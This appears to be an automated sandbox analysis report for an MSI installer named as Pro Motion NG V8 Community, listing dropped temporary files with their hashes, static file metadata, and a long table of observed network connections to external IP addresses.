SHA-512:	F7A06DB650FEC6338930DA479BD3B82D0373F5E2EB9360AFD58B30BB0144FDFD96AC1B42D9164D6718B0FFB792DC75E5281A75F7321ACAF9976CB27AC62B3998
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFAFDCAC6B4044D3C4.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBAA6C70596D62761.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5690340018537454
Encrypted:	false
SSDEEP:	48:H8PhTuRc06WXJajT5wVWd9CSC9wAErCyHTLX09CSC9eT0:GhT1RjTM1zwCSXl
MD5:	215F2393D8F9A25B30C72E2EE28D663C
SHA1:	D881A5EBCBCA23BBD70ADEE0CD7C8DE457235F6F
SHA-256:	4599FB328929EAD1FEA54164BB2E313C58F79C8DF09EF43A2DF0E433911058EC
SHA-512:	559BE698431A0A019E8C3652D78F7775DB988CB8A542E95B6E842499C8EEB252685A515F1280C982B720AF6E3D95191A27B710331C04A4F2FFDA502C97EBFF0F
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBE538ACAA276FF29.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2566392844220813
Encrypted:	false
SSDEEP:	48:W8LuqK+CFXJtT5RVWd9CSC9wAErCyHTLX09CSC9eT0:jLUVTl1zwCSXl
MD5:	1182638BD371174727A345E5BF2FCF15
SHA1:	DBB57C24C7326A8C6BAA5A3B6118C1FA60133909
SHA-256:	5FEFAB79655E08F56BFD0478CAD8E5ADC791DD2B8600F6E76ED3E1192D3239B7
SHA-512:	F7A06DB650FEC6338930DA479BD3B82D0373F5E2EB9360AFD58B30BB0144FDFD96AC1B42D9164D6718B0FFB792DC75E5281A75F7321ACAF9976CB27AC62B3998
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFD3126D4EC0F1A1B7.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFEBB7FBCB69BEABF3.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2566392844220813
Encrypted:	false
SSDEEP:	48:W8LuqK+CFXJtT5RVWd9CSC9wAErCyHTLX09CSC9eT0:jLUVTl1zwCSXl
MD5:	1182638BD371174727A345E5BF2FCF15
SHA1:	DBB57C24C7326A8C6BAA5A3B6118C1FA60133909
SHA-256:	5FEFAB79655E08F56BFD0478CAD8E5ADC791DD2B8600F6E76ED3E1192D3239B7
SHA-512:	F7A06DB650FEC6338930DA479BD3B82D0373F5E2EB9360AFD58B30BB0144FDFD96AC1B42D9164D6718B0FFB792DC75E5281A75F7321ACAF9976CB27AC62B3998
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF3DD8E0C14494BD7.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5690340018537454
Encrypted:	false
SSDEEP:	48:H8PhTuRc06WXJajT5wVWd9CSC9wAErCyHTLX09CSC9eT0:GhT1RjTM1zwCSXl
MD5:	215F2393D8F9A25B30C72E2EE28D663C
SHA1:	D881A5EBCBCA23BBD70ADEE0CD7C8DE457235F6F
SHA-256:	4599FB328929EAD1FEA54164BB2E313C58F79C8DF09EF43A2DF0E433911058EC
SHA-512:	559BE698431A0A019E8C3652D78F7775DB988CB8A542E95B6E842499C8EEB252685A515F1280C982B720AF6E3D95191A27B710331C04A4F2FFDA502C97EBFF0F
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {712FA1FF-5EDD-4B8A-A341-2347CE5946D3}, Number of Words: 10, Subject: Pro Motion NG - V8 Community, Author: cosmigo, Name of Creating Application: Pro Motion NG - V8 Community, Template: ;1033, Comments: cosmigo, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Sep 14 20:10:25 2023, Number of Pages: 200
Entropy (8bit):	7.964849722733625
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	promot_s.msi
File size:	14'749'696 bytes
MD5:	96d99e6c2e7c358b9d663595d3af5f27
SHA1:	07e7c360b6fb5bf7c124aa6156b9d3c73d0dd9ec
SHA256:	301432e6053a0f092e8f5137a97ef3543934e0f8e200bd0c7844886e4c72e7e9
SHA512:	13193d767b2c6b4aaacf4d0b6c6e87428b5431c85b1730f54c5999df11f573826b1dea22d85028a5d52aaaa43148b1f23b19078f023aa067b48c199f4dd2954e
SSDEEP:	393216:bQcblwAxiRsytVOtSOuySa3/B5Qw0a4/AlwZnb87:lbys0MSOuySuLQPa7gA
TLSH:	E6E62315F697C932E66D017BE968FF0E49393E36072405EB76E83DBE08B1DC16279902
File Content Preview:	........................>...........................................^...........m.......m.......................................S...T...~......................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2023 11:23:18.710351944 CEST	49719	443	192.168.2.5	104.193.111.117
Sep 15, 2023 11:23:18.710375071 CEST	443	49719	104.193.111.117	192.168.2.5
Sep 15, 2023 11:23:18.710454941 CEST	49719	443	192.168.2.5	104.193.111.117
Sep 15, 2023 11:23:18.711410999 CEST	49719	443	192.168.2.5	104.193.111.117
Sep 15, 2023 11:23:18.711447954 CEST	443	49719	104.193.111.117	192.168.2.5
Sep 15, 2023 11:23:18.711493015 CEST	49719	443	192.168.2.5	104.193.111.117
Sep 15, 2023 11:23:18.734272957 CEST	49720	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:18.756683111 CEST	49721	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:18.756745100 CEST	443	49721	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:18.756823063 CEST	49721	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:18.757153988 CEST	49721	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:18.757165909 CEST	443	49721	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:18.825222969 CEST	80	49720	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:18.825297117 CEST	49720	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:18.997673035 CEST	443	49721	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:18.997814894 CEST	49721	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.012411118 CEST	49720	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:19.017787933 CEST	49721	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.017816067 CEST	443	49721	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.018266916 CEST	443	49721	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.018410921 CEST	49721	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.018661976 CEST	49721	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.060746908 CEST	443	49721	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.103416920 CEST	80	49720	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:19.215413094 CEST	443	49721	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.215504885 CEST	443	49721	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.215579033 CEST	49721	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.215579987 CEST	49721	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.216108084 CEST	49721	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.216131926 CEST	443	49721	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.216880083 CEST	49722	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.216931105 CEST	443	49722	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.216995001 CEST	49722	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.217761993 CEST	49722	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.217778921 CEST	443	49722	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.305294037 CEST	80	49720	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:19.305309057 CEST	80	49720	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:19.305377007 CEST	49720	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:19.309499979 CEST	49720	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:19.452986002 CEST	443	49722	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.453085899 CEST	49722	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.670212030 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:19.670640945 CEST	49722	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.670670033 CEST	443	49722	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.673702955 CEST	49722	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.673716068 CEST	443	49722	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.761100054 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:19.761192083 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:19.761375904 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:19.788732052 CEST	443	49722	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.788839102 CEST	49722	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.788872004 CEST	443	49722	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.788893938 CEST	443	49722	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.788925886 CEST	49722	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.788940907 CEST	49722	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.788990974 CEST	49722	443	192.168.2.5	104.193.111.101
Sep 15, 2023 11:23:19.789004087 CEST	443	49722	104.193.111.101	192.168.2.5
Sep 15, 2023 11:23:19.852205038 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.214493036 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.214572906 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.214575052 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.214627981 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.214663029 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.214710951 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.214745045 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.214792013 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.214824915 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.214873075 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.214921951 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.214971066 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.215015888 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.215064049 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.215152979 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.215202093 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.215226889 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.215276957 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.215301037 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.215353012 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.215462923 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.215512037 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.215523005 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.215573072 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.215620041 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.215671062 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.215677023 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.215725899 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.215744019 CEST	80	49723	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:21.215794086 CEST	49723	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:21.366872072 CEST	49724	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:21.457156897 CEST	80	49724	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:21.457257032 CEST	49724	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:21.457422972 CEST	49724	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:21.458045006 CEST	49724	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:21.547797918 CEST	80	49724	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:21.548437119 CEST	80	49724	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:21.859769106 CEST	80	49724	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:21.859827042 CEST	80	49724	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:21.859925032 CEST	49724	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:21.861505985 CEST	49724	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:22.006851912 CEST	49725	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:22.097584009 CEST	80	49725	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:22.097676039 CEST	49725	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:22.097825050 CEST	49725	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:22.098433018 CEST	49725	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:22.188447952 CEST	80	49725	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:22.189142942 CEST	80	49725	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:22.477068901 CEST	80	49725	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:22.477157116 CEST	80	49725	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:22.477217913 CEST	49725	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:22.485640049 CEST	49725	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:22.598507881 CEST	49726	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:22.689110041 CEST	80	49726	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:22.689336061 CEST	49726	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:22.689703941 CEST	49726	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:22.690176010 CEST	49726	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:22.780205011 CEST	80	49726	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:22.780544043 CEST	80	49726	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:23.285207987 CEST	80	49726	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:23.285222054 CEST	80	49726	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:23.285281897 CEST	49726	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:23.287130117 CEST	49726	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:23.409559965 CEST	49727	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:23.501112938 CEST	80	49727	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:23.501204014 CEST	49727	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:23.501359940 CEST	49727	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:23.501979113 CEST	49727	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:23.592962980 CEST	80	49727	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:23.593552113 CEST	80	49727	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:23.811619043 CEST	80	49727	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:23.811631918 CEST	80	49727	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:23.811718941 CEST	49727	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:23.813633919 CEST	49727	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:23.929773092 CEST	49728	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:24.020315886 CEST	80	49728	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:24.020401955 CEST	49728	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:24.020549059 CEST	49728	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:24.021140099 CEST	49728	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:24.110810041 CEST	80	49728	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:24.111509085 CEST	80	49728	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:24.316487074 CEST	80	49728	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:24.316580057 CEST	80	49728	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:24.316652060 CEST	49728	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:24.318206072 CEST	49728	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:24.432451963 CEST	49731	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:24.523185968 CEST	80	49731	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:24.523278952 CEST	49731	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:24.523438931 CEST	49731	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:24.524049997 CEST	49731	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:24.614202976 CEST	80	49731	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:24.614728928 CEST	80	49731	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:24.882894039 CEST	80	49731	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:24.883013010 CEST	80	49731	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:24.883116007 CEST	49731	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:24.884818077 CEST	49731	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:25.004996061 CEST	49734	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:25.096133947 CEST	80	49734	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:25.096204042 CEST	49734	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:25.096381903 CEST	49734	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:25.096977949 CEST	49734	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:25.187355042 CEST	80	49734	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:25.187814951 CEST	80	49734	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:25.409421921 CEST	80	49734	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:25.409477949 CEST	80	49734	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:25.409548044 CEST	49734	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:25.411142111 CEST	49734	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:25.520675898 CEST	49735	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:25.611011028 CEST	80	49735	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:25.611088037 CEST	49735	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:25.611243963 CEST	49735	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:25.611848116 CEST	49735	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:25.701591969 CEST	80	49735	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:25.702147007 CEST	80	49735	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:25.984844923 CEST	80	49735	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:25.984949112 CEST	80	49735	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:25.985021114 CEST	49735	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:25.994143963 CEST	49735	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:26.114744902 CEST	49736	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:26.205144882 CEST	80	49736	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:26.205233097 CEST	49736	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:26.205435991 CEST	49736	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:26.206147909 CEST	49736	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:26.296016932 CEST	80	49736	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:26.296497107 CEST	80	49736	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:26.536751032 CEST	80	49736	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:26.536798954 CEST	80	49736	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:26.536853075 CEST	49736	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:26.538662910 CEST	49736	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:26.657875061 CEST	49737	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:26.748318911 CEST	80	49737	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:26.748420954 CEST	49737	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:26.748605967 CEST	49737	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:26.749248981 CEST	49737	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:26.839204073 CEST	80	49737	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:26.839555979 CEST	80	49737	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.090245962 CEST	80	49737	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.090291023 CEST	80	49737	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.090365887 CEST	49737	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.092205048 CEST	49737	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.584889889 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.675251007 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.675343990 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.675503969 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.676158905 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.765947104 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.766145945 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.766201019 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.766237020 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.766261101 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.766273022 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.766300917 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.766407013 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.766441107 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.766446114 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.766457081 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.766472101 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.766491890 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.766504049 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.766514063 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.766535997 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.766555071 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.766567945 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.766581059 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.766617060 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.856565952 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.856626034 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.856682062 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.856683969 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.856718063 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.856720924 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.856743097 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.856755018 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.856780052 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.856786966 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.856801987 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.856818914 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.856842041 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.856849909 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.856863976 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.856880903 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.856913090 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.856920004 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.856920004 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.856976986 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.857052088 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.857084990 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.857108116 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.857144117 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.898595095 CEST	80	49738	104.21.87.11	192.168.2.5
